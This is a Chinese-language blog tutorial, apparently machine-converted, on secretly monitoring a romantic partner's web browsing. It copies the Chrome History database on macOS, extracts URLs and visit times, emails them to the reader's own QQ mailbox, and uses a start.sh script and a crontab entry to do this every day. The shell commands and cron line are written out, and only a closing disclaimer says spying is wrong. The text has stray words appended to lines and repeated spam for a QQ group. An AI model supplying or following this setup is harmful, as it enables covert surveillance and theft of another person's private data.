用Python監控男女友天天都在看哪些網站?這招絕了

直接進入主題
需求:

(1) 獲取你對象chrome前一天的瀏覽記錄中的全部網址(url)和訪問時間,並存在一個txt文件中python

(2)將這個txt文件發送給指定的郵箱地址(你的郵箱)sql

(3)創建例行任務,天天定時自動完成這些操做,你就能夠經過郵件查看你對象天天看啥了chrome

這裏要注意:無論你是爲了Python就業仍是興趣愛好,記住:項目開發經驗永遠是核心,若是你沒有2020最新python入門到高級實戰視頻教程,能夠去小編的Python交流.裙 :七衣衣九七七巴而五(數字的諧音)轉換下能夠找到了,裏面不少新python教程項目,還能夠跟老司機交流討教!
背景:

(1)mac下chrome的瀏覽記錄在哪?怎麼獲取網址(url)和訪問時間?shell

答:路徑:/Users/用戶名/Library/Application\ Support/Google/Chrome/Default/History數據庫

History:是一個SQLite數據庫,其實就是一個文件,能夠用DB Browser for SQLitevim

去查看全部的信息,咱們要的信息在urls表中瀏覽器

怎麼獲取:用python內置的sqlite3庫鏈接History,經過sql獲得咱們想要的信息服務器

(2)怎麼發送一個帶附件的郵件?網絡

答:使用python內置的email和smtplib兩個模塊去構造和發送郵件函數

(3)怎麼把這些過程自動化?

答:使用shell腳本將這些過程鏈接起來,而後使用crontab命令定時運行

requirements:

macOS Sierra

Python3.6

Chrome

發送郵件的qq郵箱地址

qq郵箱受權碼

SMTP服務器地址 : smtp.qq.com

接受郵件的郵箱地址

代碼:

1. get_history.py

2. send_email.py

3. start.sh

4. crontab -e

連接:  密碼: fspx

執行:

(1) 首先咱們用DB Browser for SQLite來看下History中的urls表的數據組成

從表中能夠看出,咱們要的網址和訪問時間就在urls.url和urls.last_visit_time中

(2) get_history.py:經過這個腳本,咱們能夠把url和訪問時間提取出來,而且存儲在

result.txt中,下圖就是我獲得的部分結果

(3) send_email.py:經過這個腳本,咱們能夠把result.txt做爲附件,發送給指定郵箱地

址,下圖是我獲得的部分結果

(4) ./start.sh :其實,前面幾個腳本,已經完成了咱們的任務,可是每次都執行這麼多腳

本,太麻煩了,咱們能夠把這些腳本的執行語句整理成一個shell腳本。

cp /Users/Marcel/Library/Application\ Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/
python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py
python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt

這樣,咱們在終端執行./start.sh,系統就會幫咱們把這三條語句依次執行了

注意:因爲crontab命令須要絕對路徑,因此這裏的路徑都是用絕對路徑

(5) crontab :若是使用了這個命令,在電腦開機而且聯網的狀況,系統會自動執行,而後把結果發到你的郵箱

使用方法:在終端下輸入crontab -e,使用vim輸入下面一行代碼就能夠了

20 14 * * * /Users/Marcel/Desktop/tmp/code/chrome_history/start.sh

說明:前面兩個數字,就是你天天執行這個腳本的時間,我這裏設置的是14:20。

重要的事再說一遍,必定要寫絕對路徑!!!

問題:

1.server.login(from_addr, password)函數中的password不是郵箱密碼,在qq郵箱中,指的是受權碼

答:qq郵箱受權碼:什麼是受權碼,它又是如何設置?_QQ郵箱幫助中心

2.訪問History數據庫時,顯示The database is locked!

答:在咱們打開瀏覽器的同時去訪問History時,就會出現這種狀況,有兩種解決辦法:

(1)關閉瀏覽器,再去訪問

(2)把History拷貝到其餘文件夾中,而後訪問該文件夾下的History

3.timestamp時間戳怎麼轉換的

答:last_visit_time是微秒,因此要除以10^6;

last_visit_time的起始值是1601年1月1日0時0分0秒,因此要減去11644473600;

篩選昨天的數據:如今的日期與last_visit_time的差值小於1的數據,就是距離當前時

間小於1天的數據

4.crontab出錯

答:crontab中全部路徑都要寫絕對路徑,包括py腳本中的路徑也要寫絕對路徑!

5.路勁問題

答:你們在復現的時候,要注意把路勁改爲本身電腦上的,還有那個郵箱相關的信息也要改爲本身的。

總結:

注意:無論你是爲了Python就業仍是興趣愛好,記住:項目開發經驗永遠是核心,若是你沒有2020最新python入門到高級實戰視頻教程,能夠去小編的Python交流.裙 :七衣衣九七七巴而五(數字的諧音)轉換下能夠找到了,裏面不少新python教程項目,還能夠跟老司機交流討教!

1.運用python鏈接SQLite數據庫,並執行sql操做

2.運用python發送郵件

3.運用shell和crontab創建自動化例行任務

4.看別人隱私是不對的,這篇文章只是我本身瞎玩的,實際可行性不強本文的文字及圖片來源於網絡加上本身的想法,僅供學習、交流使用,不具備任何商業用途,版權歸原做者全部,若有問題請及時聯繫咱們以做處理。

相關文章
相關標籤/搜索